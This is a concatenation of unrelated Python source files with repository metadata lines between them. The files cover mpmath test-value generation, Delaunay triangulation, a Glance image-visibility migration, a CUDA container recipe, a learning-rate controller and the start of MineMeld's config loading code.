def normal_cdf2_ratio_ln(x, y, r, sqrtomr2):
if sqrtomr2 < 0.618:
omr2 = sqrtomr2*sqrtomr2
r = sign(r)*sqrt(1 - omr2)
else:
omr2 = 1-r*r
return normal_cdf2_ln(x, y, r) + (x*x+y*y-2*r*x*y)/2/omr2 + log(2*pi)
def logistic_gaussian(m, v):
if m == inf:
if v == inf:
return inf
return mpf('1.0')
if v == inf:
return mpf('0.5')
logEpsilon = log(eps)
if 2*m + 4*v < logEpsilon:
return mpf(exp(m + v/2) * (1 - exp(m + 1.5 * v) * (1 - exp(m + 2.5 * v))))
tanhm = tanh(m)
# Not really a precise threshold, but fine for our data
if tanhm == mpf('1.0'):
return tanhm
# The integration routine below is obtained by substituting x = atanh(t)*sqrt(v)
# into the definition of logistic_gaussian
#
# f = lambda x: mpmath.exp(-(x - mmpf) * (x - mmpf) / (2 * vmpf)) / (1 + mpmath.exp(-x))
# result = 1 / mpmath.sqrt(2 * mpmath.pi * vmpf) * mpmath.quad(f, [-mpmath.inf, mpmath.inf])
#
# Such substitution makes mpmath.quad call much faster.
# mpmath.quad uses exponential spacing between quadrature points, so we want the transformation to grow like log(x).
sqrtv = sqrt(v)
misqrtv = m/sqrtv
scale = max(10, m + sqrtv)/sqrtv
def f(t):
x = scale*atanh(t)
return exp(-(x - misqrtv) ** 2 / 2) / (1 + exp(-x*sqrtv)) / (1 - t * t)
coef = scale / sqrt(2 * pi)
points = [-1, 0, 1]
int, err = safe_quad(f, points)
result = coef * int
if mpf(10)**output_dps * abs(err) > abs(int):
print(f"Suspiciously big error when evaluating an integral for logistic_gaussian({nstr(m)}, {nstr(v)}).")
print(f"Integral: {nstr(int)}")
print(f"integral error estimate: {nstr(err)}")
print(f"Coefficient: {nstr(coef)}")
print(f"Result (Coefficient * Integral): {nstr(result)}")
return result
def logistic_gaussian_deriv(m, v):
if m == inf or m == -inf or v == inf:
return mpf('0.0')
# The integration routine below is obtained by substituting x = atanh(t)
# into the definition of logistic_gaussian'
#
# f = lambda x: mpmath.exp(-(x - mmpf) * (x - mmpf) / (2 * vmpf)) / ((1 + mpmath.exp(-x)) * (1 + mpmath.exp(x)))
# result = 1 / mpmath.sqrt(2 * mpmath.pi * vmpf) * mpmath.quad(f, [-mpmath.inf, mpmath.inf])
#
# Such substitution makes mpmath.quad call much faster.
def f(t):
one_minus_t_squared = 1 - t * t
return exp(-(atanh(t) - m) ** 2 / (2 * v)) / (one_minus_t_squared + sqrt(one_minus_t_squared))
coef = 0.5 / sqrt(2 * pi * v)
int, err = safe_quad(f, [-1, 1])
result = coef * int
if mpf(10)**output_dps * abs(err) > abs(int):
print(f"Suspiciously big error when evaluating an integral for logistic_gaussian'({m}, {v}).")
print(f"Integral: {int}")
print(f"integral error estimate: {err}")
print(f"Coefficient: {coef}")
print(f"Result (Coefficient * Integral): {result}")
return result
def logistic_gaussian_deriv2(m, v):
if m == inf or m == -inf or v == inf or m == mpf(0):
return mpf(0)
# The integration routine below is obtained by substituting x = atanh(t)
# into the definition of logistic_gaussian''
#
# def f(x):
# expx = mpmath.exp(x)
# one_plus_expx = 1 + expx
# return mpmath.exp(-(x - mmpf) * (x - mmpf) / (2 * vmpf)) * (1 - expx) / ((1 + mpmath.exp(-x)) * one_plus_expx * one_plus_expx)
# coef = 1 / mpmath.sqrt(2 * mpmath.pi * vmpf)
# int = mpmath.quad(f, [-mpmath.inf, mpmath.inf])
# result = coef * int
#
# Such substitution makes mpmath.quad call much faster.
def f(t):
one_minus_t = 1 - t
one_minus_t_squared = 1 - t * t
sqrt_one_minus_t_squared = sqrt(one_minus_t_squared)
return exp(-(atanh(t) - m) ** 2 / (2 * v)) * (one_minus_t - sqrt_one_minus_t_squared) / ((one_minus_t_squared + sqrt_one_minus_t_squared) * (one_minus_t + sqrt_one_minus_t_squared))
coef = 0.5 / sqrt(2 * pi * v)
int, err = safe_quad(f, [-1, 1])
result = coef * int
if mpf(10)**output_dps * abs(err) > abs(int):
print(f"Suspiciously big error when evaluating an integral for logistic_gaussian''({m}, {v}).")
print(f"Integral: {nstr(int)}")
print(f"integral error estimate: {nstr(err)}")
print(f"Coefficient: {nstr(coef)}")
print(f"Result (Coefficient * Integral): {nstr(result)}")
return result
def normal_cdf(x):
"""
An alternate way of computing ncdf that avoids the bugs in ncdf
"""
return 0.5 * gammainc(0.5, x * x / 2, inf) / gamma(0.5)
def normal_pdf_ln(x):
return -x * x / 2 - log(sqrt(2 * pi))
def normal_cdf_integral(x, y, r):
if x == -inf or y == -inf:
return mpf('0.0')
if x == inf:
return inf
if y == inf:
result = normal_cdf2(x, y, r)
if x > 0:
return result * x + exp(normal_pdf_ln(x) - log(ncdf(x)))
else:
return result * normal_cdf_moment_ratio(mpf('1.0'), x) * exp(normal_pdf_ln(x) - log(ncdf(x)))
if r == mpf(1):
if x <= y:
return normal_cdf_moment_ratio(mpf('1.0'), x) * exp(normal_pdf_ln(x))
else:
npdfy = exp(normal_pdf_ln(y))
return (normal_cdf_moment_ratio(mpf('1.0'), y) + (x - y) * ncdf(y) / npdfy) * npdfy
if r == mpf(-1):
if x + y <= 0:
return mpf(0)
else:
return x * normal_cdf2(x, y, r) + npdf(x) - npdf(y)
# This area separation works well for inputs currently present in /test/Tests/Data/SpecialFunctionsValues
# Other inputs may require making this more accurate
if x > 0 and y > 0 and 1 + r < mpf('1e-12'):
return normal_cdf_integral(x, y, -1) - normal_cdf_integral(-x, -y, r)
omr2 = (1-r)*(1+r)
sqrtomr2 = sqrt(omr2)
# This is accurate when x >= 0 and r >= 0
if True: #x >= 0 and r >= 0:
return x * normal_cdf2(x, y, r) + exp(normal_pdf_ln(x) + log(ncdf((y - r * x) / sqrtomr2))) + r * exp(normal_pdf_ln(y) + log(ncdf((x - r * y) / sqrtomr2)))
# try quadrature on the integral definition
def f(t):
return t * npdf(t - x) * normal_cdf((y - r*(x-t))/omr2)
result, err = safe_quad(f, [0, inf])
if mpf(10)**output_dps * abs(err) > abs(result):
print(f"Suspiciously big error when evaluating an integral for normal_cdf_integral({x}, {y}, {r}).")
print(f"Integral: {nstr(result)}")
print(f"integral error estimate: {nstr(err)}")
return result
def normal_cdf_integral_ratio(x, y, r):
int_z = normal_cdf_integral(x, y, r)
if int_z == mpf(0):
return int_z
z = normal_cdf2(x, y, r)
return int_z / z
def beta_cdf(x, a, b):
if x <= 0:
return 0
if x >= 1:
return 1
return betainc(a, b, 0, x, regularized=True)
pair_info = {
'BesselI.csv': besseli,
'BetaCdf.csv': beta_cdf,
'Digamma.csv': digamma,
'Erfc.csv': erfc,
'ExpMinus1.csv': expm1,
'ExpMinus1RatioMinus1RatioMinusHalf.csv': lambda x: ((exp(x) - 1) / x - 1) / x - 0.5 if x != mpf(0) else mpf(0),
'Gamma.csv': gamma,
'GammaLn.csv': loggamma,
'GammaLnSeries.csv': lambda x: loggamma(x) - (x-0.5)*log(x) + x - 0.5*log(2*pi),
'GammaLower.csv': lambda s, x: gammainc(s, 0, x, regularized=True) if s != inf else mpf(0),
'GammaUpper.csv': lambda s, x: gammainc(s, x, inf),
'GammaUpperRegularized.csv': lambda s, x: gammainc(s, x, inf, regularized=True) if s != inf else mpf(1),
'GammaUpperScale.csv' : lambda s, x: x ** s * exp(-x) / gamma(s),
'Log1MinusExp.csv': lambda x: log(1 - exp(x)),
'Log1Plus.csv': log1p,
'LogExpMinus1.csv': lambda x: log(exp(x) - 1),
'Logistic.csv': lambda x: 1 / (1 + exp(-x)),
'logisticGaussian.csv': logistic_gaussian,
'logisticGaussianDeriv.csv': logistic_gaussian_deriv,
'logisticGaussianDeriv2.csv': logistic_gaussian_deriv2,
'LogisticLn.csv': lambda x: -log(1 + exp(-x)),
'LogSumExp.csv': lambda x, y: log(exp(x) + exp(y)),
'NormalCdf.csv': ncdf,
'NormalCdf2.csv': normal_cdf2,
'NormalCdfIntegral.csv': normal_cdf_integral,
'NormalCdfIntegralRatio.csv': normal_cdf_integral_ratio,
'NormalCdfInv.csv': lambda x: -sqrt(mpf(2)) * erfinv(1 - 2 * x),
'NormalCdfLn.csv': lambda x: log(ncdf(x)),
'NormalCdfLn2.csv': normal_cdf2_ln,
'NormalCdfLogit.csv': lambda x: log(ncdf(x)) - log(ncdf(-x)),
'NormalCdfMomentRatio.csv': normal_cdf_moment_ratio,
'NormalCdfRatioLn2.csv': normal_cdf2_ratio_ln,
'Tetragamma.csv': lambda x: polygamma(2, x),
'Trigamma.csv': lambda x: polygamma(1, x),
'XMinusLog1Plus.csv': lambda x: x - log(1+x),
}
def float_str_csharp_to_python(s):
return s.replace('NaN', 'nan').replace('Infinity', 'inf')
def float_str_python_to_csharp(s):
return s.replace('nan', 'NaN').replace('inf', 'Infinity').replace('inf', 'Infinity')
dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', '..', 'test', 'Tests', 'data', 'SpecialFunctionsValues')
with os.scandir(dir) as it:
for entry in it:
if entry.name.endswith('.csv') and entry.is_file():
print(f'Processing {entry.name}...')
if entry.name not in pair_info.keys() or pair_info[entry.name] == None:
print("Don't know how to process. Skipping.")
continue
f = pair_info[entry.name]
with open(entry.path) as csvfile:
reader = csv.DictReader(csvfile, delimiter=',')
fieldnames = reader.fieldnames
arg_count = len(fieldnames) - 1
newrows = []
for row in reader:
if entry.name == 'NormalCdfRatioLn2.csv':
sqrtomr2 = mpf(float_str_csharp_to_python(row['arg3']))
r = mpf(float_str_csharp_to_python(row['arg2']))
if sqrtomr2 < 0.618:
row['arg2'] = nstr(sign(r)*sqrt(1-sqrtomr2*sqrtomr2), output_dps)
newrow = dict(row)
args = []
for i in range(arg_count):
args.append(mpf(float_str_csharp_to_python(row[f'arg{i}'])))
result_in_file = row['expectedresult']
verbose = True
if result_in_file == 'Infinity' or result_in_file == '-Infinity' or result_in_file == 'NaN':
newrow['expectedresult'] = result_in_file
else:
try:
if verbose:
print(f'{entry.name}{args}')
startTime = time.time()
result = f(*args)
if verbose:
elapsed = time.time() - startTime
print(f'({elapsed} seconds elapsed)')
nprint(result, output_dps)
except ValueError:
print(f'ValueError for args {args}. Setting result to NaN.')
result = mpf('nan')
newrow['expectedresult'] = float_str_python_to_csharp(nstr(result, output_dps))
newrows.append(newrow)
with open(entry.path, 'w', newline='') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames, delimiter=',')
writer.writeheader()
writer.writerows(newrows)
|
src/compas/geometry/triangulation/delaunay_numpy.py
|
XingxinHE/compas
| 235 |
75602
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from numpy import asarray
from scipy.spatial import Voronoi
from scipy.spatial import Delaunay
__all__ = [
'delaunay_from_points_numpy',
'voronoi_from_points_numpy',
]
def delaunay_from_points_numpy(points):
"""Computes the delaunay triangulation for a list of points using Numpy.
Parameters
----------
points : sequence of tuple
XYZ coordinates of the original points.
boundary : sequence of tuples
list of ordered points describing the outer boundary (optional)
holes : list of sequences of tuples
list of polygons (ordered points describing internal holes (optional)
Returns
-------
list
The faces of the triangulation.
Each face is a triplet of indices referring to the list of point coordinates.
Examples
--------
>>>
"""
xyz = asarray(points)
d = Delaunay(xyz[:, 0:2])
return d.simplices
def voronoi_from_points_numpy(points):
"""Generate a voronoi diagram from a set of points.
Parameters
----------
points : list of list of float
XYZ coordinates of the voronoi sites.
Returns
-------
Examples
--------
>>>
"""
points = asarray(points)
voronoi = Voronoi(points)
return voronoi
|
text/SST/params_fit.py
|
laura-rieger/deep-explanation-penalization
| 105 |
75606
|
<reponame>laura-rieger/deep-explanation-penalization
import numpy as np
from numpy.random import randint
class p:
train_both = True # whether to train just one model or both
sparse_signal = False # train on incorrect data points or not
signal_strength = 1.0 # how much to weight kl-divergence
starting_folder = '../models/init_models/' # folder that store initial models
num_iters = 3 # how many epochs to train for
seed = 42 # random seed
bias = ""
out_dir = '../models/trained_models/' # directory to save to
# exporting ########
pid = ''.join(["%s" % randint(0, 9) for num in range(0, 20)])
def _str(self):
vals = vars(p)
return 'pid=' + vals['pid']
def _dict(self):
return {attr: val for (attr, val) in vars(p).items()
if not attr.startswith('_')}
|
glance/db/sqlalchemy/alembic_migrations/data_migrations/ocata_migrate01_community_images.py
|
daespinel/glance
| 309 |
75612
|
<gh_stars>100-1000
# Copyright 2016 Rackspace
# Copyright 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import MetaData, select, Table, and_, not_
def has_migrations(engine):
"""Returns true if at least one data row can be migrated.
There are rows left to migrate if:
#1 There exists a row with visibility not set yet.
Or
#2 There exists a private image with active members but its visibility
isn't set to 'shared' yet.
Note: This method can return a false positive if data migrations
are running in the background as it's being called.
"""
meta = MetaData(engine)
images = Table('images', meta, autoload=True)
rows_with_null_visibility = (select([images.c.id])
.where(images.c.visibility == None)
.limit(1)
.execute())
if rows_with_null_visibility.rowcount == 1:
return True
image_members = Table('image_members', meta, autoload=True)
rows_with_pending_shared = (select([images.c.id])
.where(and_(
images.c.visibility == 'private',
images.c.id.in_(
select([image_members.c.image_id])
.distinct()
.where(not_(image_members.c.deleted))))
)
.limit(1)
.execute())
if rows_with_pending_shared.rowcount == 1:
return True
return False
def _mark_all_public_images_with_public_visibility(images):
migrated_rows = (images
.update().values(visibility='public')
.where(images.c.is_public)
.execute())
return migrated_rows.rowcount
def _mark_all_non_public_images_with_private_visibility(images):
migrated_rows = (images
.update().values(visibility='private')
.where(not_(images.c.is_public))
.execute())
return migrated_rows.rowcount
def _mark_all_private_images_with_members_as_shared_visibility(images,
image_members):
migrated_rows = (images
.update().values(visibility='shared')
.where(and_(images.c.visibility == 'private',
images.c.id.in_(
select([image_members.c.image_id])
.distinct()
.where(not_(image_members.c.deleted)))))
.execute())
return migrated_rows.rowcount
def _migrate_all(engine):
meta = MetaData(engine)
images = Table('images', meta, autoload=True)
image_members = Table('image_members', meta, autoload=True)
num_rows = _mark_all_public_images_with_public_visibility(images)
num_rows += _mark_all_non_public_images_with_private_visibility(images)
num_rows += _mark_all_private_images_with_members_as_shared_visibility(
images, image_members)
return num_rows
def migrate(engine):
"""Set visibility column based on is_public and image members."""
return _migrate_all(engine)
|
_solved/solutions/case-trump-vote09.py
|
DuongVit/scipy2018-geospatial-data
| 333 |
75616
|
f = plt.figure(figsize=(6,6))
plt.scatter(pres.swing_full, lp.weights.lag_spatial(w, pres.swing_full))
plt.plot((-.3,.1),(-.3,.1), color='k')
plt.title('$I = {:.3f} \ \ (p < {:.3f})$'.format(moran.I,moran.p_sim))
|
recipes/examples/scif.py
|
robertmaynard/hpc-container-maker
| 340 |
75618
|
<filename>recipes/examples/scif.py<gh_stars>100-1000
"""
Build the CUDA-STREAM benchmark for multiple CUDA compute capabilities.
Make each build available as a SCI-F application.
"""
Stage0 += baseimage(image='nvcr.io/nvidia/cuda:9.1-devel-centos7', _as='devel')
# Install the GNU compiler
Stage0 += gnu(fortran=False)
# Install SCI-F
Stage0 += pip(packages=['scif'], upgrade=True)
# Download a single copy of the source code
Stage0 += packages(ospackages=['ca-certificates', 'git'])
Stage0 += shell(commands=['cd /var/tmp',
'git clone --depth=1 https://github.com/bcumming/cuda-stream.git cuda-stream'])
# Build CUDA-STREAM as a SCI-F application for each CUDA compute capability
for cc in ['35', '60', '70']:
binpath = '/scif/apps/cc{}/bin'.format(cc)
stream = scif(name='cc{}'.format(cc))
stream += comment('CUDA-STREAM built for CUDA compute capability {}'.format(cc))
stream += shell(commands=['nvcc -std=c++11 -ccbin=g++ -gencode arch=compute_{0},code=\\"sm_{0},compute_{0}\\" -o {1}/stream /var/tmp/cuda-stream/stream.cu'.format(cc, binpath)])
stream += environment(variables={'PATH': '{}:$PATH'.format(binpath)})
stream += label(metadata={'COMPUTE_CAPABILITY': cc})
stream += shell(commands=['stream'], _test=True)
stream += runscript(commands=['stream'])
Stage0 += stream
# Runtime stage
Stage1 += baseimage(image='nvcr.io/nvidia/cuda:9.1-base-centos7')
# Install SCI-F
Stage1 += pip(packages=['scif'], upgrade=True)
# Install runtime components from the first stage
Stage1 += Stage0.runtime()
|
utils/training/learning_rate_controller.py
|
sundogrd/tensorflow_end2end_speech_recognition
| 351 |
75633
|
<filename>utils/training/learning_rate_controller.py
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""Decay learning rate per epoch."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
class Controller(object):
"""Controll learning rate per epoch.
Args:
learning_rate_init: A float value, the initial learning rate
decay_start_epoch: int, the epoch to start decay
decay_rate: A float value, the rate to decay the current learning rate
decay_patient_epoch: int, decay learning rate if results have not been
improved for 'decay_patient_epoch'
lower_better: If True, the lower, the better.
If False, the higher, the better.
worst_value: A flaot value, the worst value of evaluation
"""
def __init__(self, learning_rate_init, decay_start_epoch, decay_rate,
decay_patient_epoch=1, lower_better=True, worst_value=1):
self.learning_rate_init = learning_rate_init
self.decay_start_epoch = decay_start_epoch
self.decay_rate = decay_rate
self.decay_patient_epoch = decay_patient_epoch
self.not_improved_epoch = 0
self.lower_better = lower_better
self.best_value = worst_value
def decay_lr(self, learning_rate, epoch, value):
"""Decay learning rate per epoch.
Args:
learning_rate: A float value, the current learning rete
epoch: int, the current epoch
value: A value to evaluate
Returns:
learning_rate_decayed: A float value, the decayed learning rate
"""
if not self.lower_better:
value *= -1
if epoch < self.decay_start_epoch:
if value < self.best_value:
# Update
self.best_value = value
return learning_rate
if value < self.best_value:
# Improved
self.best_value = value
self.not_improved_epoch = 0
return learning_rate
elif self.not_improved_epoch < self.decay_patient_epoch:
# Not improved, but learning rate will be not decayed
self.not_improved_epoch += 1
return learning_rate
else:
# Not improved, and learning rate will be decayed
self.not_improved_epoch = 0
learning_rate_decayed = learning_rate * self.decay_rate
return learning_rate_decayed
|
minemeld/run/config.py
|
dreilly1982/minemeld-core
| 147 |
75646
|
<reponame>dreilly1982/minemeld-core<gh_stars>100-1000
# Copyright 2015 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
import time
import os
import os.path
import logging
import shutil
import re
import json
import multiprocessing
import functools
from collections import namedtuple
import yaml
import gevent.core
import minemeld.loader
__all__ = ['load_config', 'validate_config', 'resolve_prototypes']
# disables construction of timestamp objects
yaml.SafeLoader.add_constructor(
u'tag:yaml.org,2002:timestamp',
yaml.SafeLoader.construct_yaml_str
)
LOG = logging.getLogger(__name__)
COMMITTED_CONFIG = 'committed-config.yml'
RUNNING_CONFIG = 'running-config.yml'
PROTOTYPE_ENV = 'MINEMELD_PROTOTYPE_PATH'
MGMTBUS_NUM_CONNS_ENV = 'MGMTBUS_NUM_CONNS'
FABRIC_NUM_CONNS_ENV = 'FABRIC_NUM_CONNS'
CHANGE_ADDED = 0
CHANGE_DELETED = 1
CHANGE_INPUT_ADDED = 2
CHANGE_INPUT_DELETED = 3
CHANGE_OUTPUT_ENABLED = 4
CHANGE_OUTPUT_DISABLED = 5
_ConfigChange = namedtuple(
'_ConfigChange',
['nodename', 'nodeclass', 'change', 'detail']
)
_Config = namedtuple(
'_Config',
['nodes', 'fabric', 'mgmtbus', 'changes']
)
class MineMeldConfigChange(_ConfigChange):
def __new__(_cls, nodename, nodeclass, change, detail=None):
return _ConfigChange.__new__(
_cls,
nodename=nodename,
nodeclass=nodeclass,
change=change,
detail=detail
)
class MineMeldConfig(_Config):
def as_nset(self):
result = set()
for nname, nvalue in self.nodes.iteritems():
result.add(
json.dumps(
[nname, nvalue.get('class', None)],
sort_keys=True
)
)
return result
def compute_changes(self, oconfig):
if oconfig is None:
# oconfig is None, mark everything as added
for nodename, nodeattrs in self.nodes.iteritems():
self.changes.append(
MineMeldConfigChange(nodename=nodename, nodeclass=nodeattrs['class'], change=CHANGE_ADDED)
)
return
my_nset = self.as_nset()
other_nset = oconfig.as_nset()
deleted = other_nset - my_nset
added = my_nset - other_nset
untouched = my_nset & other_nset
# mark delted as deleted
for snode in deleted:
nodename, nodeclass = json.loads(snode)
change = MineMeldConfigChange(
nodename=nodename,
nodeclass=nodeclass,
change=CHANGE_DELETED,
detail=oconfig.nodes[nodename]
)
self.changes.append(change)
# mark added as added
for snode in added:
nodename, nodeclass = json.loads(snode)
change = MineMeldConfigChange(
nodename=nodename,
nodeclass=nodeclass,
change=CHANGE_ADDED
)
self.changes.append(change)
# check inputs/output for untouched
for snode in untouched:
nodename, nodeclass = json.loads(snode)
my_inputs = set(self.nodes[nodename].get('inputs', []))
other_inputs = set(oconfig.nodes[nodename].get('inputs', []))
iadded = my_inputs - other_inputs
ideleted = other_inputs - my_inputs
for i in iadded:
change = MineMeldConfigChange(
nodename=nodename,
nodeclass=nodeclass,
change=CHANGE_INPUT_ADDED,
detail=i
)
self.changes.append(change)
for i in ideleted:
change = MineMeldConfigChange(
nodename=nodename,
nodeclass=nodeclass,
change=CHANGE_INPUT_DELETED,
detail=i
)
self.changes.append(change)
my_output = self.nodes[nodename].get('output', False)
other_output = oconfig.nodes[nodename].get('output', False)
if my_output == other_output:
continue
change_type = CHANGE_OUTPUT_DISABLED
if my_output:
change_type = CHANGE_OUTPUT_ENABLED
change = MineMeldConfigChange(
nodename=nodename,
nodeclass=nodeclass,
change=change_type
)
self.changes.append(change)
@classmethod
def from_dict(cls, dconfig=None):
if dconfig is None:
dconfig = {}
fabric = dconfig.get('fabric', None)
if fabric is None:
fabric_num_conns = int(
os.getenv(FABRIC_NUM_CONNS_ENV, 50)
)
fabric = {
'class': 'ZMQRedis',
'config': {
'num_connections': fabric_num_conns,
'priority': gevent.core.MINPRI # pylint:disable=E1101
}
}
mgmtbus = dconfig.get('mgmtbus', None)
if mgmtbus is None:
mgmtbus_num_conns = int(
os.getenv(MGMTBUS_NUM_CONNS_ENV, 10)
)
mgmtbus = {
'transport': {
'class': 'ZMQRedis',
'config': {
'num_connections': mgmtbus_num_conns,
'priority': gevent.core.MAXPRI # pylint:disable=E1101
}
},
'master': {},
'slave': {}
}
nodes = dconfig.get('nodes', None)
if nodes is None:
nodes = {}
return cls(nodes=nodes, fabric=fabric, mgmtbus=mgmtbus, changes=[])
def _load_node_prototype(protoname, paths):
proto_module, proto_name = protoname.rsplit('.', 1)
pmodule = None
pmprotos = {}
for p in paths:
pmpath = os.path.join(p, proto_module+'.yml')
try:
with open(pmpath, 'r') as pf:
pmodule = yaml.safe_load(pf)
if pmodule is None:
pmodule = {}
except IOError:
pmodule = None
continue
pmprotos = pmodule.get('prototypes', {})
if proto_name not in pmprotos:
pmodule = None
continue
if 'class' not in pmprotos[proto_name]:
pmodule = None
continue
return pmprotos[proto_name]
raise RuntimeError('Unable to load prototype %s: '
' not found' % (protoname))
def _load_config_from_file(f):
valid = True
config = yaml.safe_load(f)
if not isinstance(config, dict) and config is not None:
raise ValueError('Invalid config YAML type')
return valid, MineMeldConfig.from_dict(config)
def _load_and_validate_config_from_file(path):
valid = False
config = None
if os.path.isfile(path):
try:
with open(path, 'r') as cf:
valid, config = _load_config_from_file(cf)
if not valid:
LOG.error('Invalid config file {}'.format(path))
except (RuntimeError, IOError):
LOG.exception(
'Error loading config {}, config ignored'.format(path)
)
valid, config = False, None
if valid and config is not None:
valid = resolve_prototypes(config)
if valid and config is not None:
vresults = validate_config(config)
if len(vresults) != 0:
LOG.error('Invalid config {}: {}'.format(
path,
', '.join(vresults)
))
valid = False
return valid, config
def _destroy_node(change, installed_nodes=None, installed_nodes_gcs=None):
LOG.info('Destroying {!r}'.format(change))
destroyed_name = change.nodename
destroyed_class = change.nodeclass
if destroyed_class is None:
LOG.error('Node {} with no class destroyed'.format(destroyed_name))
return 1
# load node class GC from entry_point or from "gc" staticmethod of class
node_gc = None
mmep = installed_nodes_gcs.get(destroyed_class, None)
if mmep is None:
mmep = installed_nodes.get(destroyed_class, None)
try:
nodep = mmep.ep.load()
if hasattr(nodep, 'gc'):
node_gc = nodep.gc
except ImportError:
LOG.exception("Error checking node class {} for gc method".format(destroyed_class))
else:
try:
node_gc = mmep.ep.load()
except ImportError:
LOG.exception("Error resolving gc for class {}".format(destroyed_class))
if node_gc is None:
LOG.error('Node {} with class {} with no garbage collector destroyed'.format(
destroyed_name, destroyed_class
))
return 1
try:
node_gc(
destroyed_name,
config=change.detail.get('config', None)
)
except:
LOG.exception('Exception destroying old node {} of class {}'.format(
destroyed_name, destroyed_class
))
return 1
return 0
def _destroy_old_nodes(config):
# this destroys resources used by destroyed nodes
# a nodes has been destroyed if a node with same
# name & config does not exist in the new config
# the case of different node config but same and name
# and class is handled by node itself
destroyed_nodes = [c for c in config.changes if c.change == CHANGE_DELETED]
LOG.info('Destroyed nodes: {!r}'.format(destroyed_nodes))
if len(destroyed_nodes) == 0:
return
installed_nodes = minemeld.loader.map(minemeld.loader.MM_NODES_ENTRYPOINT)
installed_nodes_gcs = minemeld.loader.map(minemeld.loader.MM_NODES_GCS_ENTRYPOINT)
dpool = multiprocessing.Pool()
_bound_destroy_node = functools.partial(
_destroy_node,
installed_nodes=installed_nodes,
installed_nodes_gcs=installed_nodes_gcs
)
dpool.imap_unordered(
_bound_destroy_node,
destroyed_nodes
)
dpool.close()
dpool.join()
dpool = None
def _load_config_from_dir(path):
ccpath = os.path.join(
path,
COMMITTED_CONFIG
)
rcpath = os.path.join(
path,
RUNNING_CONFIG
)
ccvalid, cconfig = _load_and_validate_config_from_file(ccpath)
rcvalid, rcconfig = _load_and_validate_config_from_file(rcpath)
if not rcvalid and not ccvalid:
# both running and canidate are not valid
print(
"At least one of", RUNNING_CONFIG,
"or", COMMITTED_CONFIG,
"should exist in", path,
file=sys.stderr
)
sys.exit(1)
elif rcvalid and not ccvalid:
# running is valid but candidate is not
return rcconfig
elif not rcvalid and ccvalid:
# candidate is valid while running is not
LOG.info('Switching to candidate config')
cconfig.compute_changes(rcconfig)
LOG.info('Changes in config: {!r}'.format(cconfig.changes))
_destroy_old_nodes(cconfig)
if rcconfig is not None:
shutil.copyfile(
rcpath,
'{}.{}'.format(rcpath, int(time.time()))
)
shutil.copyfile(ccpath, rcpath)
return cconfig
elif rcvalid and ccvalid:
LOG.info('Switching to candidate config')
cconfig.compute_changes(rcconfig)
LOG.info('Changes in config: {!r}'.format(cconfig.changes))
_destroy_old_nodes(cconfig)
shutil.copyfile(
rcpath,
'{}.{}'.format(rcpath, int(time.time()))
)
shutil.copyfile(ccpath, rcpath)
return cconfig
def _detect_cycles(nodes):
# using Topoligical Sorting to detect cycles in graph, see Wikipedia
graph = {}
S = set()
L = []
for n in nodes:
graph[n] = {
'inputs': [],
'outputs': []
}
for n, v in nodes.iteritems():
for i in v.get('inputs', []):
if i in graph:
graph[i]['outputs'].append(n)
graph[n]['inputs'].append(i)
for n, v in graph.iteritems():
if len(v['inputs']) == 0:
S.add(n)
while len(S) != 0:
n = S.pop()
L.append(n)
for m in graph[n]['outputs']:
graph[m]['inputs'].remove(n)
if len(graph[m]['inputs']) == 0:
S.add(m)
graph[n]['outputs'] = []
nedges = 0
for n, v in graph.iteritems():
nedges += len(v['inputs'])
nedges += len(v['outputs'])
return nedges == 0
def resolve_prototypes(config):
# retrieve prototype dir from environment
# used for main library and local library
paths = os.getenv(PROTOTYPE_ENV, None)
if paths is None:
raise RuntimeError('Unable to load prototypes: %s '
'environment variable not set' %
(PROTOTYPE_ENV))
paths = paths.split(':')
# add prototype dirs from extension to paths
prototypes_entrypoints = minemeld.loader.map(minemeld.loader.MM_PROTOTYPES_ENTRYPOINT)
for epname, mmep in prototypes_entrypoints.iteritems():
if not mmep.loadable:
LOG.info('Prototypes entrypoint {} not loadable'.format(epname))
continue
try:
ep = mmep.ep.load()
# we add prototype paths in front, to let extensions override default protos
paths.insert(0, ep())
except:
LOG.exception(
'Exception retrieving path from prototype entrypoint {}'.format(epname)
)
# resolve all prototypes
valid = True
nodes_config = config.nodes
for _, nconfig in nodes_config.iteritems():
if 'prototype' in nconfig:
try:
nproto = _load_node_prototype(nconfig['prototype'], paths)
except RuntimeError as e:
LOG.error('Error loading prototype {}: {}'.format(
nconfig['prototype'],
str(e)
))
valid = False
continue
nconfig.pop('prototype')
nconfig['class'] = nproto['class']
nproto_config = nproto.get('config', {})
nproto_config.update(
nconfig.get('config', {})
)
nconfig['config'] = nproto_config
return valid
def validate_config(config):
result = []
nodes = config.nodes
for n in nodes.keys():
if re.match('^[a-zA-Z0-9_\-]+$', n) is None: # pylint:disable=W1401
result.append('%s node name is invalid' % n)
for n, v in nodes.iteritems():
for i in v.get('inputs', []):
if i not in nodes:
result.append('%s -> %s is unknown' % (n, i))
continue
if not nodes[i].get('output', False):
result.append('%s -> %s output disabled' %
(n, i))
installed_nodes = minemeld.loader.map(minemeld.loader.MM_NODES_ENTRYPOINT)
for n, v in nodes.iteritems():
nclass = v.get('class', None)
if nclass is None:
result.append('No class in {}'.format(n))
continue
mmep = installed_nodes.get(nclass, None)
if mmep is None:
result.append(
'Unknown node class {} in {}'.format(nclass, n)
)
continue
if not mmep.loadable:
result.append(
'Class {} in {} not safe to load'.format(nclass, n)
)
if not _detect_cycles(nodes):
result.append('loop detected')
return result
def load_config(config_path):
if os.path.isdir(config_path):
